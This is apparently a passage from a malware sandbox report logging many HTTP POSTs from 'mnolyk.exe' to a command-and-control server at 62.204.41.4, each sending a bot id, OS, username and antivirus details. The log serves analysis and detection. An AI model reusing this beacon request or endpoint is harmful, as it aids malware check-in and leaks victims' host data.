                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      493192.168.2.75022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:12.187047958 CET953OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.251094103 CET953INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      494192.168.2.75022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:12.425383091 CET954OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.489129066 CET954INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      495192.168.2.75022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:12.656455994 CET955OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.718499899 CET955INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      496192.168.2.75022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:12.894334078 CET956OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.959162951 CET956INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      497192.168.2.75022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:13.126471043 CET957OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.190808058 CET957INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      498192.168.2.75022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:13.375751972 CET958OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.441234112 CET958INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      499192.168.2.75022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:13.624630928 CET959OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.687376976 CET959INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.74972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:57.348762989 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:57.413033962 CET437INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      50192.168.2.74977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:09.754519939 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.819736958 CET482INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      500192.168.2.75022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:13.886569023 CET960OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:13.951585054 CET960INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      501192.168.2.75022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:14.131855965 CET961OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.197653055 CET961INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      502192.168.2.75023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:14.375520945 CET962OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.438237906 CET962INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      503192.168.2.75023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:14.609316111 CET963OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.672333002 CET963INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      504192.168.2.75023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:14.844485998 CET964OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:14.907803059 CET964INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      505192.168.2.75023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:15.078905106 CET965OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.144630909 CET965INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      506192.168.2.75023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:15.320717096 CET966OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.384686947 CET966INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      507192.168.2.75023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:15.569377899 CET967OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.633167982 CET967INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      508192.168.2.75023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:15.815188885 CET968OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:15.879889965 CET968INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      509192.168.2.75023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:16.048099041 CET969OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.114763975 CET969INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      51192.168.2.74977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:09.999213934 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
